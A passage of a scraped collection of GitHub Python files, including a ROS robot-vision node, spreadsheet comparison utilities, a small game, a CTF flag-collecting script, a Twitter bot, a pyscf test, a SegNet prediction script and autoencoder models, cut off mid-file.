M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n return cX, cY\n\n def spin(self):\n try:\n while not rospy.is_shutdown():\n self._tick()\n self.rate.sleep()\n finally:\n if self.recording:\n self.recorder.release()\n\n def _draw_bounding_rects(self, frame, objects, outlines):\n for i, o in enumerate(objects):\n x, y, w, h = cv2.boundingRect(outlines[i])\n cv2.rectangle(frame, (x, y), (x + w, y + h), tuple(o['rgb']), 2)\n cv2.putText(frame, o['name'], (x - 20, y - 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, tuple(o['rgb']), 2)\n self.recorder.write(frame)\n\n def _tick(self):\n if pi:\n frame = self.cap.read()\n frame = cv2.flip(frame, -1)\n else:\n _, frame = self.cap.read()\n if frame is not None:\n robots, _, r_outlines = self.search(frame, self.robots)\n goals, _, g_outlines = self.search(frame, self.goals)\n msg = Vision()\n msg.robot_list = \", \".join([robot['name'] for robot in robots])\n self.robot_pub.publish(msg)\n self.goal_pub.publish(True if goals else False)\n if self.recording:\n self._draw_bounding_rects(frame, robots + goals, r_outlines + g_outlines)\n\n\ndef _test():\n rd = RobotDetector()\n if pi:\n cap = rd.cap\n else:\n cap = cv2.VideoCapture(0)\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480))\n\n rec = False\n while True:\n if pi:\n frame = cap.read()\n else:\n _, frame = cap.read()\n objects, coords, outlines = rd.search(frame, rd.robots)\n for i, o in enumerate(objects):\n x, y, w, h = cv2.boundingRect(outlines[i])\n cv2.rectangle(frame, (x, y), (x + w, y + h), o['rgb'], 2)\n cv2.putText(frame, o, (x - 20, y - 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, o['rgb'], 2)\n cv2.imshow('frame2', frame)\n if not pi:\n out.write(frame)\n key = cv2.waitKey(10)\n if key & 0xFF == ord('r'):\n if rec:\n out.release()\n rec = False\n else:\n print(\"Recording\")\n rec = True\n if key & 0xFF == ord('q'):\n break\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n if pi:\n try:\n cv = RobotDetector()\n cv.spin()\n except rospy.ROSInterruptException:\n cv.cap.stop()\n else:\n _test()\n","repo_name":"rddunphy/CRUES","sub_path":"crues_pi/ros_pkgs/crues_sensors/scripts/vision_node.py","file_name":"vision_node.py","file_ext":"py","file_size_in_byte":6873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39395059400","text":"import logging\n\nfrom openpyxl import load_workbook\n\nfrom bcompiler.utils import index_returns_directory\nfrom bcompiler.process import Cleanser\n\nlogger = logging.getLogger('bcompiler.process.simple_comparitor')\n\n\nclass BCCell:\n\n def __init__(self, value, row_num=None, col_num=None, cellref=None):\n self.value = value\n self.row_num = row_num\n self.col_num = col_num\n self.cellref = cellref\n\n\nclass ParsedMaster:\n\n def __init__(self, master_file):\n self.master_file = master_file\n self._projects = []\n self._project_count = None\n self._key_col = []\n self._wb = load_workbook(self.master_file)\n self._ws = self._wb.active\n self._project_header_index = {}\n self._parse()\n\n def _cleanse_key(self, key):\n c = Cleanser(key)\n return c.clean()\n\n def _parse(self):\n \"\"\"\n Private method to set up the class.\n self._key_col is column 'A' in the masters format.\n \"\"\"\n self._projects = [cell.value for cell in self._ws[1][1:]]\n# self._projects.sort()\n self._project_count = len(self.projects)\n self._key_col = [self._cleanse_key(cell.value) for cell in self._ws['A']]\n self._index_projects()\n\n @property\n def projects(self):\n \"\"\"\n Returns a list of project titles in the master.\n \"\"\"\n return self._projects\n\n def _create_single_project_tuple(self, column=None, col_index=None):\n \"\"\"\n Private method to construct a tuple of key, values based on\n the particular project (identified by reference to the its column,\n and can be given as a letter ('H') or an integer.\n\n This method is internal and is called by self.get_project_data.\n \"\"\"\n if col_index is None:\n col_data = self._ws[column]\n z = list(zip(self._key_col, col_data))\n return [((item[0]), (item[1].value)) for item in z]\n else:\n col_data = []\n for row in self._ws.iter_rows(\n min_row=1,\n max_col=col_index,\n min_col=col_index,\n max_row=len(self._key_col)\n ):\n count = 0\n for cell in row:\n col_data.append(cell.value)\n count += 1\n z = list(zip(self._key_col, col_data))\n return [((item[0]), (item[1])) for item in z]\n\n def _index_projects(self):\n self._project_header_index = {}\n for cell in self._ws[1]:\n if cell.value in self.projects:\n self._project_header_index[cell.value] = cell.col_idx\n\n def print_project_index(self):\n print('{:<68}{:>5}'.format(\"Project Title\", \"Column Index\"))\n print('{:*^80}'.format(''))\n for k, v in self._project_header_index.items():\n print('{:<68}{:>5}'.format(k, v))\n\n def _create_dict_all_project_tuples(self):\n pass\n\n def __repr__(self):\n return \"ParsedMaster for {}\".format(\n self.master_file\n )\n\n def get_project_data(self, column=None, col_index=None):\n if column is None and col_index is None:\n raise TypeError('Please include at least one param')\n\n if column == 'A':\n raise TypeError(\"column must be 'B' or later in alphabet\")\n\n if column:\n if isinstance(column, type('b')):\n data = self._create_single_project_tuple(column)\n else:\n raise TypeError('column must be a string')\n\n if col_index:\n if isinstance(col_index, type(1)):\n data = self._create_single_project_tuple(col_index=col_index)\n else:\n raise TypeError('col_index must be an integer')\n\n return data\n\n def _query_for_key(self, data, key):\n \"\"\"\n Iterate through keys in output from get_project_data\n data list and return True if a key is found. Does not return\n anything if not found.\n \"\"\"\n for item in data:\n if item[0] == key:\n self._query_result = item[1]\n return True\n\n def get_data_with_key(self, data, key):\n \"\"\"\n Given a data list with project key/values in it (derived from\n a master spreadsheet, query a specific key to return a value.\n \"\"\"\n # first query that the value exists\n if self._query_for_key(data, key):\n return self._query_result\n else:\n logger.warning(\"No key {} in comparing master. Check for double spaces in cell in master. Skipping\".format(key))\n return None\n\n def index_target_files_with_previous_master(self):\n \"\"\"\n A previous master has a column-order of projects. If we are going\n to compare this with a series of projects used in bcompiler compile,\n which traverses a target directory and compiles each in turn into\n a master spreadsheet, the order must match, otherwise comparing\n values will not work.\n\n This function first gets obtains the order of project names from the\n files in the 'returns' directory, the it obtains the order or projects\n from the column headers in the master file from this object.\n \"\"\"\n target_project_names = index_returns_directory()\n master_title_names = [\n key for key, value in self._project_header_index.items()]\n return (target_project_names, master_title_names)\n\n\ndef populate_cells(worksheet, bc_cells=[]):\n \"\"\"\n Populate a worksheet with bc_cell object data.\n \"\"\"\n for item in bc_cells:\n if item.cellref:\n worksheet[item.cellref].value = item.value\n else:\n worksheet.cell(\n row=item.row_num, column=item.col_num, value=item.value)\n return worksheet\n\n\nclass FileComparitor:\n \"\"\"\n Simple method of comparing data in two master spreadsheets.\n \"\"\"\n\n def __init__(self, masters=[]):\n \"\"\"\n We want to get a list of master spreadsheets. These are simple\n file-references. The latest master should be master[-1].\n \"\"\"\n self._comp_type = None\n\n if len(masters) > 2:\n raise ValueError(\"You can only analyse two spreadsheets.\")\n\n if len(masters) == 2:\n # we're comparing two files\n self._masters = masters\n self._comp_type = 'two'\n self._get_data()\n\n if len(masters) == 1:\n # we're comparing against one single master\n self._master = masters[0]\n self._comp_type = 'one'\n self._get_data()\n\n def _get_data(self):\n \"\"\"\n Private method that creates two ParsedMaster objects in a tuple. First\n is the earlier master, the second is the current. These states are\n derived from the order that the file references are given to the\n constructor.\n \"\"\"\n if self._comp_type == 'two':\n self._early_master = ParsedMaster(self._masters[0])\n self._current_master = ParsedMaster(self._masters[1])\n return (self._early_master, self._current_master)\n\n if self._comp_type == 'one':\n self._early_master = ParsedMaster(self._master)\n return self._early_master\n\n @property\n def data(self):\n return self._early_master\n\n def compare(self, proj_index, key):\n \"\"\"\n Returns a tuple of two values, the first is the value of key in\n proj_index in the early master, the second the equivalent in the\n current master. proj_index should be an integer and can be derived\n from the import spreadsheet or by ParsedMaster.print_project_index.\n \"\"\"\n if self._comp_type == 'two':\n project_data_early = self._early_master.get_project_data(\n col_index=proj_index)\n project_data_current = self._current_master.get_project_data(\n col_index=proj_index)\n return(\n self._early_master.get_data_with_key(\n project_data_early, key),\n self._current_master.get_data_with_key(\n project_data_current, key))\n\n if self._comp_type == 'one':\n project_data_early = self._early_master.get_project_data(\n col_index=proj_index)\n return(\n self._early_master.get_data_with_key(project_data_early, key))\n","repo_name":"yulqen/bcompiler","sub_path":"bcompiler/process/simple_comparitor.py","file_name":"simple_comparitor.py","file_ext":"py","file_size_in_byte":8478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24641988428","text":"# using random module for health potion\n\nimport random\n\n# choose your difficulty\n\nprint(\"Which difficulty would you like? [Easy, Medium, Hard]\")\n\n# first variable\n\ndifficulty1 = input('Difficulty: ').strip()\n\n# if statement that exits if difficulty does not exist\n\nif 'Easy' in difficulty1:\n print('Potions will heal 25-50 health')\n\nelif 'Medium' in difficulty1:\n print('Potions will health 13-25 health')\n\nelif 'Hard' in difficulty1:\n print('Potions will heal 8-16 health')\n\nelse:\n exit()\n\n# assigning value to 'health' variable\n\nhealth = 50\n\n# the higher the difficulty the less health the potion will give\n# assigning a list to a variable for this\n\ndifficulty2 = [1,2,3]\n\n# another if statement referring back to the first variable to determine output\n# converting all output to integers as we don't want floats in the new variable\n\nif 'Easy' in difficulty1:\n potion_health = random.randint(25,50) / int(difficulty2[0])\n print('This time you will gain...')\n print(int(potion_health), 'health')\n\nelif 'Medium' in difficulty1:\n potion_health = random.randint(25,50) / int(difficulty2[1])\n print('This time you will gain...')\n print(int(potion_health), 'health')\n\nelif 'Hard' in difficulty1:\n potion_health = random.randint(25,50) / int(difficulty2[2])\n print('This time you will gain...')\n print(int(potion_health), 'health')\n\nelse:\n exit()\n\n# assigning 'health' variable a new value by adding it to our new variable 'potion_health'\n\nhealth = health + potion_health\n\n# displays health depending on difficulty chosen\n\nprint('Your total health is now', int(health))\n","repo_name":"Jarodx4/Learning","sub_path":"potion_project.py","file_name":"potion_project.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25585987565","text":"import requests\nimport json\n\nBASE_IP = \"http://10.10.169.100:3000/\"\n\nresponse = {\"value\":\"s\",\"next\":\"f\"}\nflag = \"\"\nwhile response['next'] != \"end\":\n flag += response['value']\n url = BASE_IP + response['next']\n res = requests.get(url)\n response = json.loads(res.text)\n\n print(flag)\n","repo_name":"krishnan-tech/ctf-writeups","sub_path":"tryhackme/25daysofchristmas/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"34498977078","text":"from openpyxl import Workbook\nfrom openpyxl.utils import get_column_letter\n\n# 实例化一个工作簿对象\nwb = Workbook()\n\n# 定义 excel 文件名\ndest_filename = 'empty_book.xlsx'\n\n# 选取了当前工作的sheet对象\nws1 = wb.active\n\n# 为 sheet 命名\nws1.title = \"range names\"\nfor row in range(1,40):\n ws1.append(range(600))\n\nws2 = wb.create_sheet(title='Pi')\nws2['F5'] = 3.14\n\nws3 = wb.create_sheet(title=\"Data\")\nfor row in range(10,20):\n for col in range(27,54):\n _ = ws3.cell(column=col, row=row, value=\"{0}\".format(get_column_letter(col))) # 得到表格列的字母编号\n\nprint(ws3['AA10'].value)\n\nwb.save(filename=dest_filename)\n\n\n","repo_name":"Shelbin/laixiaobin_autotest","sub_path":"hogwarts/oper_excel/write_excel.py","file_name":"write_excel.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26673519598","text":"import tweepy\nimport config\nimport redditnews\nimport text2emoji\n\nauth = tweepy.OAuthHandler(config.CONSUMER_KEY, config.CONSUMER_SECRET)\nauth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth)\n\n#tweet clean up\nuser = api.me()\ntweetHistory = api.user_timeline(id = user.id)\nfor tweet in tweetHistory:\n api.destroy_status(id = tweet.id)\n\nheadlines = redditnews.getRedditHeadlines()\nfor headline in headlines:\n api.update_status(status = text2emoji.sentence_to_emoji(headline))\n\nprint('End')\n","repo_name":"SergioSanchez12/TwitterBot","sub_path":"twitterbot.py","file_name":"twitterbot.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74228913762","text":"from __future__ import print_function, division\nimport os,unittest\nfrom pyscf.nao import tddft_iter\n\ndname = os.path.dirname(os.path.abspath(__file__))\n\ntd = tddft_iter(label='water', cd=dname)\ntry:\n from pyscf.lib import misc\n libnao_gpu = misc.load_library(\"libnao_gpu\")\n td_gpu = tddft_iter(label='water', cd=dname, GPU=True)\nexcept:\n td_gpu = None\n\nclass KnowValues(unittest.TestCase):\n \n def test_tddft_iter(self):\n \"\"\" This is iterative TDDFT with SIESTA starting point \"\"\"\n self.assertTrue(hasattr(td, 'xocc'))\n self.assertTrue(hasattr(td, 'xvrt'))\n self.assertTrue(td.ksn2f.sum()==8.0) # water: O -- 6 electrons in the valence + H2 -- 2 electrons\n self.assertEqual(td.xocc[0].shape[0], 4)\n self.assertEqual(td.xvrt[0].shape[0], 19)\n dn0 = td.apply_rf0(td.moms1[:,0])\n\n def test_tddft_iter_gpu(self):\n \"\"\" Test GPU version \"\"\"\n if td_gpu is not None:\n self.assertTrue(hasattr(td_gpu, 'xocc'))\n self.assertTrue(hasattr(td_gpu, 'xvrt'))\n self.assertTrue(td_gpu.ksn2f.sum()==8.0) # water: O -- 6 electrons in the valence + H2 -- 2 electrons\n self.assertEqual(td_gpu.xocc[0].shape[0], 4)\n self.assertEqual(td_gpu.xvrt[0].shape[0], 19)\n dn0 = td_gpu.apply_rf0(td_gpu.moms1[:,0])\n\n \n\nif __name__ == \"__main__\": unittest.main()\n","repo_name":"pyscf/nao","sub_path":"pyscf/nao/test/test_0017_tddft_iter_nao.py","file_name":"test_0017_tddft_iter_nao.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"73450808803","text":"import SegNet\nfrom Pavements import Pavements\n\nimport os\nimport argparse\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torchvision.utils import save_image\nfrom itertools import product\n\nNUM_OF_CLASSES = 4\nMODEL_NAME = './models/model_10.pth.tar'\n\ndef build_color_map():\n # assumes no. of classes to be <= 64\n color_map = torch.tensor(list(product([63, 127, 191, 255], repeat=3)))\n\n print()\n print(\"Map of class to color: \")\n for class_ind, color in enumerate(color_map):\n print(\"Class: {}, RGB Color: {}\".format(class_ind + 1, color))\n\n print()\n\n return color_map\n\ncuda_available = torch.cuda.is_available()\nmodel = SegNet.SegNet(in_chn=3, out_chn=NUM_OF_CLASSES, BN_momentum=0.5)\n\nif cuda_available:\n model.cuda()\n\nmodel.eval()\n\ncheckpoint = torch.load(MODEL_NAME)\nepoch = checkpoint['epoch']\nstate_dict = checkpoint['state_dict']\nmodel.load_state_dict(state_dict)\nprint(\"Checkpoint is loaded at {} | Epochs: {}\".format(MODEL_NAME, epoch))\n\n\ndataset = Pavements('./CamVid/test', './CamVid/test_labels')\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=1)\ncolor_map = build_color_map()\n\nfor i, data in enumerate(dataloader):\n images, labels = data\n labels = labels.type(torch.long)\n\n if cuda_available:\n images = images.cuda()\n labels = labels.cuda()\n \n result = model(images)\n result = torch.argmax(result, dim=1).type(torch.long)\n\n for j in range(result.shape[0]):\n input_image = images[j]\n label_image = color_map[labels[j]].permute(2, 0, 1).to(torch.float).div(255.0)\n result_image = color_map[result[j]].permute(2, 0, 1).to(torch.float).div(255.0)\n\n if cuda_available:\n input_image =input_image.cuda()\n label_image = label_image.cuda()\n result_image = result_image.cuda()\n \n folder = ['input', 'label', 'result']\n for k, img in enumerate([input_image, label_image, result_image]):\n path = './results/{}/{}_{}.png'.format(folder[k], i, j)\n save_image(img, path)\n ","repo_name":"chiajoukuo/dlcv_final","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22492589720","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\n\nfrom dataclasses import dataclass\nfrom functools import reduce\n\nfrom typing import List\n\nTORCH_PI = torch.acos(torch.zeros(1))\n\nclass BasicAE(nn.Module):\n def __init__(self, feature_dims : int = 10, latent_dim : int = 64, latent_out=False, softplus=True):\n super().__init__()\n self._latent_dim = latent_dim\n\n if isinstance(feature_dims, tuple):\n self.encoding_layer = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(feature_dims), self._latent_dim)\n )\n self.decoding_layer = torch.nn.Sequential(\n torch.nn.Linear(self._latent_dim, tuple_product(feature_dims)),\n ReshapeView(feature_dims)\n )\n else:\n self.encoding_layer = nn.Linear(feature_dims, latent_dim)\n self.decoding_layer = nn.Linear(latent_dim, feature_dims)\n\n self.latent_out = latent_out\n\n self.softplus = softplus\n\n def forward(self, x):\n z = self.encode(x)\n x = self.decode(z)\n if self.latent_out:\n return x, {\"latent\": z}\n else:\n return x\n\n def encode(self, x):\n if self.softplus:\n x = F.softplus(self.encoding_layer(x))\n else:\n x = self.encoding_layer(x)\n return x\n\n def decode(self, x):\n x = self.decoding_layer(x)\n return x\n\n\nclass Basic2LAE(nn.Module):\n def __init__(self, feature_dims : int = 10, intermediate_dim=100, latent_dim : int = 64):\n super().__init__()\n self._latent_dim = latent_dim\n\n\n if isinstance(feature_dims, tuple):\n self.encoding_layer = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(feature_dims), self._latent_dim)\n )\n self.decoding_layer = torch.nn.Sequential(\n torch.nn.Linear(self._latent_dim, tuple_product(feature_dims)),\n ReshapeView(feature_dims)\n )\n else:\n self.encoding_layer = nn.Linear(intermediate_dim, latent_dim)\n self.decoding_layer = nn.Linear(intermediate_dim, feature_dims)\n\n self.encoding_h = nn.Linear(feature_dims, intermediate_dim)\n\n self.decoding_h = nn.Linear(latent_dim, intermediate_dim)\n\n self.act = F.softplus #F.LeakyRelu\n self.fact = lambda x: x #F.softplus #F.tanh\n\n def forward(self, x):\n x = self.encode(x)\n x = self.decode(x)\n return x\n\n def encode(self, x):\n x = self.act(self.encoding_h(x))\n x = self.fact(self.encoding_layer(x))\n return x\n\n def decode(self, x):\n x = self.act(self.decoding_h(x))\n x = self.fact(self.decoding_layer(x))\n return x\n\n\n\nclass BasicVAE(nn.Module):\n def __init__(self,\n feature_dims : int = 10, latent_dim : int = 64,\n encoding_act=None, decoding_act=None, final_act=None):\n super().__init__()\n self._latent_dim = latent_dim\n\n if isinstance(feature_dims, tuple):\n tot_features = tuple_product(feature_dims)\n im_features = tot_features//2\n print(tot_features)\n self.encoding_layer_0 = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tot_features,\n im_features)\n )\n self.decoding_layer_mu = torch.nn.Sequential(\n torch.nn.Linear(im_features, tot_features),\n ReshapeView(feature_dims)\n )\n self.decoding_layer_logvar = torch.nn.Sequential(\n torch.nn.Linear(im_features, tot_features),\n ReshapeView(feature_dims)\n )\n else:\n tot_features = feature_dims\n im_features = tot_features//2\n self.encoding_layer_0 = nn.Linear(feature_dims, im_features)\n self.decoding_layer_mu = nn.Linear(im_features, feature_dims)\n self.decoding_layer_logvar = nn.Linear(im_features, feature_dims)\n \n \n\n self.encoding_mu = nn.Linear(im_features, latent_dim)\n self.encoding_logvar = nn.Linear(im_features, latent_dim)\n\n self.decoding_layer_0 = nn.Linear(latent_dim, im_features)\n\n if encoding_act is not None:\n self.encoding_act = encoding_act\n else:\n self.encoding_act = F.leaky_relu\n\n if decoding_act is not None:\n self.decoding_act = decoding_act\n else:\n self.decoding_act = F.leaky_relu\n\n def encode(self, x):\n m, l = self.encode_(x)\n if self.training:\n return self.reparametrize(m, l)\n else:\n return m\n \n def encode_(self, x):\n x = self.encoding_act(self.encoding_layer_0(x))\n mu = self.encoding_mu(x)\n logvar = self.encoding_logvar(x)\n return mu, logvar\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self, x):\n x = self.decoding_act(self.decoding_layer_0(x))\n mu = self.decoding_layer_mu(x)\n logvar = self.decoding_layer_logvar(x)\n return mu, logvar\n\n def forward(self, x):\n mu_latent, logvar_latent = self.encode_(x)\n z = self.reparametrize(mu_latent, logvar_latent)\n mu_x, logvar_x = self.decode(z)\n if self.training:\n x_out = self.reparametrize(mu_x, logvar_x)\n else:\n x_out = mu_x\n return x_out, {\"mu_latent\" : mu_latent, \"logvar_latent\" : logvar_latent,\n \"mu_x\" : mu_x, \"logvar_x\" : logvar_x}\n\n\ndef tuple_product(t):\n return reduce(lambda x, y: x * y, t, 1)\n \n@dataclass\nclass ConvSpec1D:\n # convolution\n channels : int = 1\n kernel : int = 2\n stride : int = 1\n dilation : int = 1\n # batch_norm\n batch_norm : bool = False\n # activation\n activation : callable = torch.nn.Identity\n _reverse_activation: callable = None\n\n @property\n def reverse_activation(self):\n if self._reverse_activation is not None:\n return self._reverse_activation\n else:\n return self.activation\n \n \n \n@dataclass\nclass LinearSpec:\n size : [int, float] = 0.5\n # batch_norm\n dropout : bool = False\n batch_norm : bool = False\n # activation\n activation : callable = torch.nn.Identity\n _reverse_activation: callable = None\n\n @property\n def reverse_activation(self):\n if self._reverse_activation is not None:\n return self._reverse_activation\n else:\n return self.activation\n\nclass ReshapeView(nn.Module):\n def __init__(self, shape):\n super(ReshapeView, self).__init__()\n self._shape = shape\n\n def forward(self, x):\n return x.view(-1, *self._shape)\n \n def extra_repr(self) -> str:\n return f'reshape to [B, {self._shape}]'\n\n \n\nclass UberVAE(nn.Module):\n def __init__(self,\n feature_dims : int = 10, latent_dim : int = 64,\n n_conv_layers_1d : List[ConvSpec1D] = None,\n n_linear_layers : List[LinearSpec] = None,\n distributive_latent=True, distributive_recon=False,\n output_mu=True, logloss2sigmoid=False,\n #latent_activation=None, final_activation=False, # TODO!\n ):\n super(UberVAE, self).__init__()\n self._conv_encoder = torch.nn.Identity()\n self._conv_decoder = torch.nn.Identity()\n\n self._lin_encoder = torch.nn.Identity()\n self._lin_decoder = torch.nn.Identity()\n\n self._feature_dims = feature_dims\n self._flatten_input = False\n self._blowup_channels = False\n self._conv_interface_shape = None\n self._conv_interface_size = None\n self._latent_interface_size = feature_dims\n self._latent_size = latent_dim\n\n # behavioral parameters\n self._distributive_latent = distributive_latent\n self._distributive_recon = distributive_recon\n self._output_mu = output_mu\n self._logloss2sigmoid = logloss2sigmoid\n\n conv_encoding_layers = []\n conv_decoding_layers = []\n deconv_channel_sizes = []\n deconv_output_sizes = []\n last_conv_decoding_layer_idx = 0\n if n_conv_layers_1d:\n self._blowup_channels = True\n if isinstance(feature_dims, tuple):\n self._blowup_channels = False\n conv_inchannels = feature_dims[0]\n conv_prev_output_dims = [feature_dims]\n else:\n conv_encoding_layers.append(ReshapeView((1, feature_dims)))\n conv_inchannels = 1\n conv_prev_output_dims = [(1, feature_dims,)]\n\n conv_channel_sizes = [conv_inchannels] + \\\n [(cspec.channels) for cspec in n_conv_layers_1d]\n\n for conv_idx in range(len(n_conv_layers_1d)):\n cspec = n_conv_layers_1d[conv_idx]\n conv_part = torch.nn.Conv1d(conv_channel_sizes[conv_idx],\n cspec.channels, cspec.kernel,\n stride=cspec.stride, dilation=cspec.dilation)\n sample_batch = conv_part(torch.rand(1, *(conv_prev_output_dims[conv_idx])))\n conv_encoding_layers.append(conv_part)\n conv_prev_output_dims.append(tuple(sample_batch.shape[1:]))\n if cspec.batch_norm:\n conv_encoding_layers.append(torch.nn.BatchNorm1d(sample_batch.shape[1]))\n conv_encoding_layers.append(cspec.activation())\n conv_encoding_layers.append(torch.nn.Flatten())\n\n print(\"convolution outputs \", \"-\".join([str(x) for x in conv_prev_output_dims])) \n \n self._conv_interface_shape = tuple(conv_prev_output_dims[-1])\n self._conv_interface_size = tuple_product(self._conv_interface_shape)\n self._latent_interface_size = self._conv_interface_size\n\n deconv_channel_sizes = list(reversed(conv_prev_output_dims))\n deconv_layers1d = list(reversed(n_conv_layers_1d))\n \n conv_decoding_layers.append(ReshapeView(self._conv_interface_shape))\n for dc_idx in range(len(deconv_layers1d)):\n last_conv_decoding_layer_idx = len(conv_decoding_layers)\n cspec = deconv_layers1d[dc_idx]\n output_shape = (0, 0)\n deconv_part = None\n out_padding = 0\n for i in range(2):\n deconv_part = torch.nn.ConvTranspose1d(\n cspec.channels, deconv_channel_sizes[dc_idx+1][0], cspec.kernel,\n stride=cspec.stride, dilation=cspec.dilation,\n output_padding=out_padding)\n sample_batch = deconv_part(torch.rand(1, *deconv_channel_sizes[dc_idx]))\n output_shape = sample_batch.shape\n if output_shape[-1] != deconv_channel_sizes[dc_idx+1][-1]:\n out_padding = deconv_channel_sizes[dc_idx+1][-1]-output_shape[-1]\n else:\n break\n deconv_output_sizes.append(output_shape)\n conv_decoding_layers.append(deconv_part)\n if cspec.batch_norm:\n conv_decoding_layers.append(torch.nn.BatchNorm1d(output_shape[0]))\n conv_decoding_layers.append(cspec.reverse_activation())\n\n if self._blowup_channels:\n conv_decoding_layers.append(ReshapeView((feature_dims,)))\n\n lin_encoding_layers = []\n lin_decoding_layers = []\n lin_layer_upsizes = []\n last_decoding_layer_idx = 0\n if n_linear_layers:\n if not n_conv_layers_1d and isinstance(feature_dims, tuple):\n self._flatten_input = True\n lin_input = tuple_product(feature_dims)\n lin_encoding_layers.append(torch.nn.Flatten())\n elif n_conv_layers_1d:\n lin_input = self._conv_interface_size\n else:\n lin_input = feature_dims\n\n lin_layer_insizes = [lin_input,] + \\\n [int(lspec.size*self._latent_interface_size) if isinstance(lspec.size, float) else lspec.size\n for lspec in n_linear_layers]\n\n for lin_idx in range(len(n_linear_layers)):\n lspec = n_linear_layers[lin_idx]\n if lspec.dropout:\n raise NotImplementedError\n lin_layer = torch.nn.Linear(lin_layer_insizes[lin_idx],\n lin_layer_insizes[lin_idx+1])\n lin_encoding_layers.append(lin_layer)\n if lspec.batch_norm:\n lin_encoding_layers.append(torch.nn.BatchNorm1d(lin_layer_insizes[lin_idx+1]))\n lin_encoding_layers.append(lspec.activation())\n\n self._latent_interface_size = lin_layer_insizes[-1]\n\n lin_layer_upsizes = list(reversed(lin_layer_insizes))\n lin_layers_up = list(reversed(n_linear_layers))\n\n for rlin_idx in range(len(lin_layers_up)):\n last_decoding_layer_idx = len(lin_decoding_layers)\n lspec = lin_layers_up[rlin_idx]\n lin_layer = torch.nn.Linear(lin_layer_upsizes[rlin_idx], lin_layer_upsizes[rlin_idx+1])\n lin_decoding_layers.append(lin_layer)\n if lspec.batch_norm:\n lin_decoding_layers.append(torch.nn.BatchNorm1d(\n lin_layer_upsizes[rlin_idx+1]))\n lin_decoding_layers.append(lspec.reverse_activation())\n\n if self._flatten_input:\n lin_decoding_layers.append(ReshapeView(feature_dims))\n \n\n if isinstance(self._feature_dims, tuple) and (not n_conv_layers_1d) and not(n_linear_layers):\n self._mu_latent = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(self._feature_dims), self._latent_size)\n )\n self._logvar_latent = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(self._feature_dims), self._latent_size)\n )\n \n else:\n self._mu_latent = torch.nn.Linear(self._latent_interface_size, self._latent_size)\n self._logvar_latent = torch.nn.Linear(self._latent_interface_size, self._latent_size)\n\n\n if isinstance(self._feature_dims, tuple) and (not n_conv_layers_1d) and not(n_linear_layers):\n self._mu_x = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, tuple_product(self._feature_dims)),\n ReshapeView(self._feature_dims)\n )\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, tuple_product(self._feature_dims)),\n ReshapeView(self._feature_dims)\n )\n elif (not n_conv_layers_1d) and not(n_linear_layers):\n self._mu_x = torch.nn.Linear(self._latent_size, self._feature_dims)\n self._logvar_x = torch.nn.Linear(self._latent_size, self._feature_dims)\n else:\n self._mu_x = None\n self._logvar_x = None\n\n\n if conv_encoding_layers:\n self._conv_encoder = torch.nn.Sequential(*conv_encoding_layers)\n if lin_encoding_layers:\n self._conv_decoder = torch.nn.Sequential(*conv_decoding_layers[:last_conv_decoding_layer_idx])\n else:\n self._conv_decoder = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, self._latent_interface_size),\n *conv_decoding_layers[:last_conv_decoding_layer_idx])\n self._mu_x = torch.nn.Sequential(*conv_decoding_layers[last_conv_decoding_layer_idx:])\n #print(deconv_channel_sizes)\n if self._blowup_channels:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(deconv_channel_sizes[len(n_conv_layers_1d)-1]),\n self._feature_dims),\n torch.nn.Tanh()\n )\n else:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(deconv_channel_sizes[len(n_conv_layers_1d)-1][-1],\n self._feature_dims[-1]),\n torch.nn.Tanh()\n )\n\n if lin_encoding_layers:\n self._lin_encoder = torch.nn.Sequential(*lin_encoding_layers)\n if conv_encoding_layers:\n self._lin_decoder = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, self._latent_interface_size),\n *lin_decoding_layers)\n #print(lin_layer_upsizes)\n else:\n self._lin_decoder = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, self._latent_interface_size),\n 